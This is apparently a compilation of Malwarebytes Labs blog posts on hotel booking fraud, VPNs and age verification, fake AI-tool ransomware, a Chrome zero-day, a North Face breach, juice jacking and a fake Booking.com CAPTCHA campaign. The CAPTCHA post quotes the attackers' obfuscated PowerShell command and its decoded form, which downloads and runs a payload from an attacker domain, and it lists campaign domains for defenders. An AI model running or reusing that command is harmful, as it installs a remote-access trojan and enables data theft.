The Swiss National Cyber Security Centre (NCSC) reported similar attacks where hotel staff were tricked into installing malware through fake CAPTCHAs and malicious clipboard commands. These infections compromise hotel booking systems, allowing attackers to manipulate guest communications and payments.

To be clear, these types of online scams are so effective because the hotel itself has been compromised, and travelers log into official, verified websites and services only to receive malicious messages from cybercriminals who are secretly in control. These aren’t fake websites—these are fake representatives for real hotels using the hotels’ own messaging platforms to speak with customers.

Once the criminals infect the booking system, they can access guest data, and payment information, enabling them to impersonate hotels and reach guests directly.

Adding to this picture is a warning from Arcona Hotels & Resorts who discovered “technical irregularities” and disconnected several locations from the central IT services as a precautionary measure to limit potential damage. ResponseOne GmbH, a company specializing in IT forensics, was brought in to conduct a technical analysis and manage the situation.

Arcona Hotels & Resorts is a German-based company specializing in operating and developing hotels, particularly focusing on leisure and holiday hotels, boutique hotels, and 5-star properties. While we have no direct information about what happened there, the timing and nature of their advisory suggest that this incident might be part of a wider campaign targeting the hospitality industry’s digital infrastructure.

Advice for travelers

 Cybercriminals are no longer just targeting guests. They are infiltrating hospitality systems themselves, turning trusted platforms into vectors for fraud.

Robert lost a few hundred quid and the trust in his bank, the travel platform he used, and a bit of trust in his own judgement. While Robert was vigilant and still became a victim, there are some tips to keep in mind:

• Always access booking platforms by typing URLs directly into your browser rather than clicking links in emails or messages.
• Verify any payment requests by contacting the hotel or booking platform through official channels. You can also call the hotel directly.
• Be suspicious of urgent payment demands or requests for unusual payment methods.
• Use credit cards for bookings where possible, or other options that provide fraud protection.
• Report suspicious messages to the booking platform immediately.
• Use browser protection against scams, credit card skimmers, and other malicious sites.

Be aware of the fact that the systems you trust might be compromised. Vigilance and proactive security measures are essential for both travelers and hotels to mitigate these risks.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

VPNs (Virtual Private Networks) are suddenly popular in France. Not because France has suddenly become super privacy conscious, but because Pornhub, RedTube, and YouPorn, have blocked access in France.

But why? Last year, France enacted a law mandating that pornographic sites implement stricter age-verification technology.

Since March 1, 1994, French law has prohibited exposing minors to pornographic content. To strengthen this, a 2020 law empowered the French Regulatory Authority for Audiovisual and Digital Communication (ARCOM) to issue warnings to non-compliant online services and seek judicial orders to block access if necessary.

In 2024, the French law on securing and regulating the digital environment (SREN) further enhanced ARCOM’s authority, allowing it to administratively block platforms that fail to prevent minors from accessing pornographic content.

On October 9, 2024, ARCOM adopted a technical framework, approved by the French Data Protection Agency (CNIL), outlining minimum requirements for age verification systems.

The requirements consisted of three major pillars:

• Reliability
• Third party implementation
• Mandatory on each access

Services had until January 9, 2025, to comply with a transitional period until April 9, 2025, during which credit card-based verification was temporarily accepted under specific conditions.

In response to these regulations, the major adult websites like Pornhub, YouPorn, and RedTube have now suspended access in France, citing concerns over user privacy and data security associated with the mandated age verification methods.

This is a major decision for Pornhub because France is its second biggest market behind the US. Alex Kekesi, VP of president of brand and community of Aylo Holdings (Pornhub’s owner) said that:

“French citizens deserve a government and a regulator who are serious about preventing children from accessing adult content. They also deserve laws which protect their privacy and safeguard their sensitive data.”

In the United States, 19 states have passed laws requiring pornographic sites to confirm a user’s age by checking a government-issued ID, scanning their face, or other methods. The laws have led some of the largest adult sites, including Pornhub, to block users from those states, rather than paying millions for ID-checking services.

Naturally, everywhere where people want to View Porn Normally, the use of VPNs has increased because VPNs can be used to circumvent access restrictions imposed by such regulations. While specific figures for France are not publicly available, similar scenarios in other regions provide insight into user behavior:

• Florida: Following Pornhub’s decision to block access in response to new age verification laws, VPN demand in Florida surged by an astonishing 1,150% within the first few hours.
• Texas: After the implementation of comparable laws, VPN usage increased by approximately 234.8%.

Malwarebytes Privacy VPN

Malwarebytes Privacy VPN can help adults to decide for themselves what they want to see or not. By choosing a location where no age verification block is in place, you will be able to access your coveted websites while also enjoying:

• No-log policy: Your activity is neither tracked nor stored.
• WireGuard protocol: Ensures fast and secure connections, good for streaming.
• Server coverage: Plenty of servers near you to cover countries that are not blocked.
• Strong encryption: To keep your web activity safe from prying eyes.

Artificial intelligence (AI) and small business tools are being abused as smokescreens to hit unsuspecting victims with ransomware.

In the masquerade campaigns discovered by Cisco Talos, cybercriminals hid malware behind software and install packages that mimicked the websites or names of the lead monetization service Nova Leads, the enormously popular Chat GPT, and an AI-empowered video tool called InVideo AI.

As small businesses quickly adopt AI tools—a recent survey from the US Chamber of Commerce and the strategy firm Teneo revealed that 98% of small businesses already use at least one AI-powered product and 40% use generative AI—these cybercriminal lures pose the next, big threat to sole proprietors and boutique shops.

According to the researchers at Cisco Talos, the threat is twofold.

“Unsuspecting businesses in search of AI solutions may be deceived into downloading counterfeit tools in which malware is embedded,” Talos said. “This practice poses a significant risk, as it not only compromises sensitive business data and financial assets but also undermines trust in legitimate AI market solutions.”

In the first potential online attack, Talos found that cybercriminals created a fake website that closely resembled that of the legitimate company Nova Leads. The company helps businesses with lead monetization through acquisition, conversion, and content creation. But rather than simply copying the look and feel of Nova’s website, the cybercriminals also offered a completely fake, AI-powered product called “Nova Leads AI.”

On the malicious website, users were prompted to download Nova Leads AI for ”free access” for 12 months. If users downloaded and installed the fake software, the ransomware CyberLock was instead deployed. Researchers at Talos analyzed how CyberLock moved throughout a network and retrieved the ransom note left behind by the cybercriminals. In it, the ransomware gang claimed, falsely, that their attacks were altruistic.

“We want to assure you that your payment does not go to us,” the ransomware gang said in its note. “It will instead go to support affected women and children in Palestine, Ukraine, Africa, Asia, and other regions where injustices are a daily reality.”

In the note, victims are directed to pay $50,000 in cryptocurrency. The ransomware campaign is particularly dangerous as cybercriminals managed to manipulate SEO practices to rank their malicious website near the top of relevant online searches. This method, called “SEO poisoning,” is deployed by scammers, hackers, and shady websites.

In a second potential attack, Talos found that a software installer labeled “ChatGPT 4.0 full version – Premium.exe” was actually hiding the ransomware Lucky_Gh0$t. Interestingly, the files contained within the installer also contained legitimate open-source AI tools from Microsoft, likely as an evasion technique to ward off any antivirus tools inspecting the package for malware.

Though the Lucky_Gh0$t ransom note did not include a specific dollar amount, the cybercriminals displayed a starkly different attitude from CyberLock’s alleged humanitarianism:

“We are not a politically motivated group and we do not need anything other than your money.”

In the last potential attack, Talos found a new malware that the team dubbed “Numero.” Though it is not officially a form of ransomware, Talos found that, once deployed, it effectively renders systems “completely unusable.”

Talos discovered that the malware’s internal data co-opted the product and organizations names of the service InVideo AI, an AI-powered video generation service that can be used for marketing, content, and more.

While cybercriminals have long disguised their malware under popular brands, the emergence of AI—and its popularity for small businesses—highlight the dangers that small shops face simply for trying to do business online. But there is help at hand.

How to protect your small business from ransomware

As is true with all malware infections, the best defense to a ransomware attack is to never allow an attack to occur in the first place. Take on the following steps to secure your business from this existential threat:

• Block common forms of entry. Patch known vulnerabilities in internet-facing software and disable or harden the login credentials for remote work tools like RDP ports and VPNs.
• Prevent intrusions and stop malicious encryption. Stop threats early before they can infiltrate or infect your endpoints. Use always-on cybersecurity software that can prevent exploits and malware used to deliver ransomware.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated an outbreak and stopped a first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Google has released an update for the Chrome browser to patch an actively exploited flaw.

The update brings the Stable channel to versions 137.0.7151.68/.69 for Windows and Mac and 137.0.7151.68 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click the “more menu” (three stacked dots) >  Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from the vulnerability.

The About Chrome menu while updating

This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to exploit a specially crafted HTML page (website).

Technical details

The vulnerability tracked as CVE-2025-5419 is an out-of-bounds read and write in Google Chrome’s “V8,” which is the engine that Google developed for processing JavaScript. Prior to Google Chrome version 137.0.7151.68, this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

V8 has been a significant source of security problems in the past.

An out-of-bounds read and write vulnerability means that the attacker can manipulate parts of the device’s memory that should be out of their reach. Such a flaw in a program allows it to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers can write code to a part of the memory where the system executes it with permissions that the program and user should not have.

Google knows that attackers currently exploit CVE-2025-5419 in the wild, but released no details yet on who exploits the flaw, how they do it in real-world attacks, or who the targets are in those attacks. However, the Google Threat Analysis Group (TAG) team, which discovered the exploit, focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.

This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability.

We don’t just report on browser vulnerabilities. Malwarebytes’ Browser Guard protects your browser against malicious websites and credit card skimmers, blocks unwanted ads, and warns you about relevant data breaches and scams.

Mobile scams are becoming increasingly sophisticated, leaving people vulnerable to cybercriminals.  

We recently reported on the ever-increasing number of scams that are created by AI-supported tools, with attackers crafting highly convincing phishing emails that target both individuals and businesses, resulting in devastating financial losses, reputational damage, and compromised personal data.  

Elaborate sextortion scams manipulate victims by using shame as a tactic to coerce them into taking action, sometimes draining their life savings.  

And the list goes on. Scammers are always finding new ways to trick their victims into giving them their hard-earned money or sensitive information. 

These tactics include urging individuals to change their address information on a non-existent delivery, promoting job opportunities that just seem too good to be true, or having a long-lost family member reach out on WhatsApp to invite you to share their newfound fortune with you.  

As scammers develop new ways of exploiting unsuspecting users, Malwarebytes is introducing Scam Guard to combat this new wave of threats.  

Scam Guard simplifies scam prevention by providing real-time feedback via an easy-to-use AI-powered chat. Just submit a screenshot, paste suspicious content, or share texts and numbers, and we’ll give you immediate personalized guidance and safety tips. 

Scam Guard is unique in that it’s backed by Malwarebytes extensive threat research knowledge base, making it both effective and efficient.  

Whether users come across a suspicious message on social media, a phishing attempt in their email, or a questionable text message, Scam Guard provides immediate, expert advice to keep them secure. 

Key features of Scam Guard

• AI-powered chat companion: An intuitive, mobile-first advisor available 24/7 that provides guidance to users on suspicious content or activities. 

• Comprehensive scam detection: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall, and shipping fraud, helping you stay ahead of cybercriminals at all times.  

• Constantly evolving: Scam Guard learns from users who submit new or unknown scams, which in turn helps protect the broader community.  

• 24/7 support: Scam Guard is available around the clock, ensuring that users receive timely advice and assistance, no matter where they are or what time it is. 

• Holistic mobile security: Embedded within the Malwarebytes Mobile Security app, Scam Guard works alongside our all-in-one advanced protection for iOS and Android. 

Reporting suspicious content has never been easier—simply tap to submit right in the app.  

Scam Guard is available for both free and paid users of Malwarebytes Mobile Security (iOS and Android), without having to install an additional app.  

Try it out for yourself: Download Malwarebytes Mobile Security for iOS or Android.  

For the fourth time in its history, The North Face has notified customers that their account may have been compromised. This time, the company laid blame on a credential stuffing attack.

The North Face is best known for its line of outdoor clothing, footwear, and related equipment. With an annual revenue of over $3 billion, companies like The North Face are on the radar of cybercriminals.

The notice from The North Face says:

“On April 23, 2025, we discovered unusual activity involving our website, thenorthface.com (“Website”), which we investigated immediately. Following a careful and prompt investigation, we concluded that an attacker had launched a small-scale credential stuffing attack against our Website on April 23, 2025.”

Credential stuffing is the automated injection of stolen username and password pairs in to website login forms, in order to fraudulently gain access to user accounts. Many users reuse the same password and username/email, so if those credentials are stolen from one site, for example in a data breach or phishing attack, attackers can use the same credentials to compromise accounts on other services.

With these credentials, the attackers may have found additional information like:

• Purchases made on the website
• Shipping address(es)
• Preferences
• Email address(es)
• First and last name
• Date of birth (if the user saved it to their account)
• Telephone number (if the user saved it to their account)

The North Face also said that no payment card data was compromised, as the company does not keep a copy of that information on the website. But the kind of data that was compromised still enriches a cybercriminal’s data set and helps them in performing more targeted and effective attacks.

The North Face also said:

“Please know that protecting your personal information is something that we take very seriously.”

One would think that after four credential stuffing attacks, The North Face would at least introduce the option to use multi-factor-authentication (MFA) on their website, but there’s no sign of that, let alone the enforcement of MFA. Maybe that’s because the credential stuffing attacks were dwarfed by the December 2023 ransomware attack that was later confirmed to have impacted 35 million customers.

Instead, The North Face stated that it quickly disabled passwords to halt the attack, and all users will need to create a new and unique password on the website if they have not already done so.

The emphasis on unique was done by me, because credential stuffing attacks are only successful because we have so many passwords that it’s no wonder we re-use them. Alternatively, people can look at password managers which can create and memorize complex passwords for you. But to me, it proves once again that it’s time to leave the era of passwords behind us.

The North Face is joining a long line of high-end targets that were recently attacked, including Adidas, Dior, Tiffany, Cartier, Victoria’s Secret, and Marks & Spencer.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
• Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
• Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

The Identity Theft Resource Center’s regularly published statistics show that it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Remember juice jacking? It’s a term that crops up every couple of years to worry travelers. This spring has seen another spate of stories, including a new, more sophisticated form of attack. But how much of a threat is it, really?

Juice jacking is where an attacker uses a malicious public USB charger to install malware on, or steal information from, your phone. In theory, the victim plugs their phone into a USB charging port like those found in airports, restaurants or public transportation to top up their battery. The attacker has programmed the charger to start a data connection with the phone, allowing them to perhaps view files or control apps.

Both Apple and Android operating system developer Google coded rudimentary protections against juice jacking into their operating systems years ago. They updated their software so that users would have to approve any request to control the phone via a USB port.

However, as Ars Technica reported last week, researchers have found a way past these mechanisms in a new variation on the theme called ChoiceJacking.

Ars offers a detailed technical analysis of the exploit, invented by researchers at Austria’s Graz University of Technology. In short, though, it gives itself permission to control the phone by spoofing the user’s button-pressing for them.

Government agencies continue to warn about the risks of juice jacking. The TSA was the most recent, posting a warning about the issue on Facebook back in March:

“Hackers can install malware at USB ports (we’ve been told that’s called ‘juice/port jacking’). So, when you’re at an airport do not plug your phone directly into a USB port. Bring your TSA-compliant power brick or battery pack and plug in there.”

The TSA is well-intentioned, but behind the times. The FBI’s Denver office tweeted about this threat back in 2023, and the LA County District Attorney’s office posted about it in 2019.

Researchers have highlighted the threat since at least 2011, when the Defcon conference installed public charging stations that would flash a warning message on peoples’ phones. Since then, others have presented on the possible risks, and enterprising tinkerers have released malicious cables that take control of devices when plugged into them.

Have any juicers actually been jacked?

The FCC, which has had an advice page about this issue since 2019, said two years ago that it hadn’t found any real-world attacks, and Malwarebytes hasn’t found any since.

However, the lack of publicly documented attacks doesn’t mean that juice jacking isn’t a risk. It’s theoretically feasible. So how can you prevent against it?

Both Apple and Google have updated their operating systems to require more robust authentication than simply pressing a button when a connected USB device asks to take over your phone. However, not all iPhone users will necessarily update their devices. Android-based smartphone vendors get to implement their own versions of the operating system on their own schedule, and many take a long time to roll out new protections if they do so at all.

One way to be sure that your phone won’t get hijacked by a malicious charging station is to use a USB cable that has the data communication pins disconnected, meaning that a malicious charging port can’t talk to your phone. However, the Ars article warns that this might also interfere with the charging process on some phones.

One alternative is to power down your phone before plugging it in. Or take your own portable charging battery with you and skip the ports altogether.

Oh, and don’t use public Wi-Fi, says TSA

On another note, the TSA Facebook post also offered another piece of advice: “Don’t use free public WiFi, especially if you’re planning to make any online purchases,” it warned. “Do not ever enter any sensitive info while using unsecure WiFi [sic].”

This advice has merit. Attackers can snoop on public Wi-Fi connections, although the advancement of HTTPS on websites mean this is less of a risk nowadays for everyday browsing. However, if you’re doing anything of a sensitive nature, such as online banking, you can use a VPN to encrypt your traffic.

A simple alternative is to simply use cellular data instead, tethering your phone if you’re using a tablet or PC.

Which of these anti-juice-hacking and Wi-Fi snooping protections should you choose? As with all cybersecurity decisions, this is a question of how much risk you’re prepared to tolerate. Personally, I err on the side of caution. A little inconvenience now could save you significant trouble later.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha prompt

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device

If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users

The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning

“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase   at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com

(booking.)badgustrewivers.com[.]com

(booking.)property-paids[.]com

(booking.)rewiewqproperty[.]com

(booking.)extranet-listing[.]com

(booking.)guestsalerts[.]com

(booking.)gustescharge[.]com

kvhandelregis[.]com

patheer-moreinfo[.]com

guestalerthelp[.]com

rewiewwselect[.]com

hekpaharma[.]com

bkngnet[.]com

partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com How to stay safe

There are a few things you can do to protect yourself from falling victim to these and similar methods:

• Do not follow instructions provided by a website you visited without thinking it through.
• Use an active anti-malware solution that blocks malicious websites and scripts.
• Use a browser extension that blocks malicious domains and scams.
• Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Porn sites probed for allegedly failing to prevent minors from accessing content
• Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts
• Deepfake-posting man faces huge $450,000 fine
• Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
• New warning issued over toll fee scams
• 184 million logins for Instagram, Roblox, Facebook, Snapchat, and more exposed online

Last week on ThreatDown:

• KMSpico explained: No, KMS is not “kill Microsoft”
• When you shouldn’t trust a trusted root certificate

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW